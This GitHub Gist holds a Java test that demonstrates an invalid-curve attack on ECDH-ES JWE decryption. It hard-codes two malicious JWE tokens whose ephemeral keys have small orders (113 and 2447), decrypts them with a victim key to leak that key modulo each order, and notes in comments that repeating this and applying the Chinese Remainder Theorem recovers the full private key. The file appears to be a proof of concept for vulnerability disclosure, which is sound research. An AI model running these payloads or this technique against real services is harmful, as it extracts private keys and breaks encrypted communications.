Last active
March 15, 2017 18:39
-
-
Save asanso/5b8cabb862e6f730e00a97d8565dc325 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| private static ECKey generateECJWK(final ECKey.Curve curve) | |
| throws Exception { | |
| final ECParameterSpec ecParameterSpec = curve.toECParameterSpec(); | |
| KeyPairGenerator generator = KeyPairGenerator.getInstance("EC"); | |
| generator.initialize(ecParameterSpec); | |
| KeyPair keyPair = generator.generateKeyPair(); | |
| final ECPrivateKey privateKey = (ECPrivateKey) keyPair.getPrivate(); | |
| ECPrivateKey pk = new ECPrivateKey() { | |
| BigInteger bi = new BigInteger( | |
| "38124166010662753100689735609285807169841714722622367731519061366402702420444"); | |
| @Override | |
| public ECParameterSpec getParams() { | |
| return ecParameterSpec; | |
| } | |
| @Override | |
| public String getFormat() { | |
| return privateKey.getFormat(); | |
| } | |
| @Override | |
| public byte[] getEncoded() { | |
| return bi.toByteArray(); | |
| } | |
| @Override | |
| public String getAlgorithm() { | |
| return privateKey.getAlgorithm(); | |
| } | |
| @Override | |
| public BigInteger getS() { | |
| return bi; | |
| } | |
| }; | |
| return new ECKey.Builder(curve, (ECPublicKey) keyPair.getPublic()) | |
| .privateKey(pk).build(); | |
| } | |
| public void testCycle_ECDH_ES_Curve_P256() throws Exception { | |
| ECKey ecJWK = generateECJWK(ECKey.Curve.P_256); | |
| BigInteger privateReceiverKEy = ecJWK.toECPrivateKey().getS(); | |
| JWEHeader header = new JWEHeader.Builder(JWEAlgorithm.ECDH_ES, | |
| EncryptionMethod.A128GCM) | |
| .agreementPartyUInfo(Base64URL.encode("Alice")) | |
| .agreementPartyVInfo(Base64URL.encode("Bob")).build(); | |
| // ========================= attacking point #1 with order 113 | |
| // ====================== | |
| BigInteger attackerOrderGroup1 = new BigInteger("113"); | |
| BigInteger receiverPrivateKeyModAttackerOrderGroup1 = privateReceiverKEy | |
| .mod(attackerOrderGroup1); | |
| System.out.println("The receiver private key is equal to " | |
| + receiverPrivateKeyModAttackerOrderGroup1 + " mod " | |
| + attackerOrderGroup1); | |
| // The malicious JWE contains a public key with order 113 | |
| String maliciousJWE1 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiZ1RsaTY1ZVRRN3otQmgxNDdmZjhLM203azJVaURpRzJMcFlrV0FhRkpDYyIsInkiOiJjTEFuakthNGJ6akQ3REpWUHdhOUVQclJ6TUc3ck9OZ3NpVUQta2YzMEZzIiwiY3J2IjoiUC0yNTYifX0.qGAdxtEnrV_3zbIxU2ZKrMWcejNltjA_dtefBFnRh9A2z9cNIqYRWg.pEA5kX304PMCOmFSKX_cEg.a9fwUrx2JXi1OnWEMOmZhXd94-bEGCH9xxRwqcGuG2AMo-AwHoljdsH5C_kcTqlXS5p51OB1tvgQcMwB5rpTxg.72CHiYFecyDvuUa43KKT6w"; | |
| JWEObject jweObject1 = JWEObject.parse(maliciousJWE1); | |
| ECDHDecrypter decrypter = new ECDHDecrypter(ecJWK.toECPrivateKey()); | |
| decrypter.getJCAContext().setContentEncryptionProvider( | |
| BouncyCastleProviderSingleton.getInstance()); | |
| jweObject1.decrypt(decrypter); | |
| // this proof that receiverPrivateKey is equals 26 % 113 | |
| assertEquals("Gambling is illegal at Bushwood sir, and I never slice.", | |
| jweObject1.getPayload().toString()); | |
| // ========================= attacking point #2 with order 2447 | |
| // ====================== | |
| BigInteger attackerOrderGroup2 = new BigInteger("2447"); | |
| BigInteger receiverPrivateKeyModAttackerOrderGroup2 = privateReceiverKEy | |
| .mod(attackerOrderGroup2); | |
| System.out.println("The receiver private key is equal to " | |
| + receiverPrivateKeyModAttackerOrderGroup2 + " mod " | |
| + attackerOrderGroup2); | |
| // The malicious JWE contains a public key with order 2447 | |
| String maliciousJWE2 = "eyJhbGciOiJFQ0RILUVTK0ExMjhLVyIsImVuYyI6IkExMjhDQkMtSFMyNTYiLCJlcGsiOnsia3R5IjoiRUMiLCJ4IjoiWE9YR1E5XzZRQ3ZCZzN1OHZDSS1VZEJ2SUNBRWNOTkJyZnFkN3RHN29RNCIsInkiOiJoUW9XTm90bk56S2x3aUNuZUprTElxRG5UTnc3SXNkQkM1M1ZVcVZqVkpjIiwiY3J2IjoiUC0yNTYifX0.UGb3hX3ePAvtFB9TCdWsNkFTv9QWxSr3MpYNiSBdW630uRXRBT3sxw.6VpU84oMob16DxOR98YTRw.y1UslvtkoWdl9HpugfP0rSAkTw1xhm_LbK1iRXzGdpYqNwIG5VU33UBpKAtKFBoA1Kk_sYtfnHYAvn-aes4FTg.UZPN8h7FcvA5MIOq-Pkj8A"; | |
| JWEObject jweObject2 = JWEObject.parse(maliciousJWE2); | |
| decrypter.getJCAContext().setContentEncryptionProvider( | |
| BouncyCastleProviderSingleton.getInstance()); | |
| jweObject2.decrypt(decrypter); | |
| // this proof that receiverPrivateKey is equals 2446 % 2447 | |
| assertEquals("Gambling is illegal at Bushwood sir, and I never slice.", | |
| jweObject2.getPayload().toString()); | |
| // THIS CAN BE DOIN MANY TIME | |
| // .... | |
| // AND THAN CHINESE REMAINDER THEOREM FTW | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment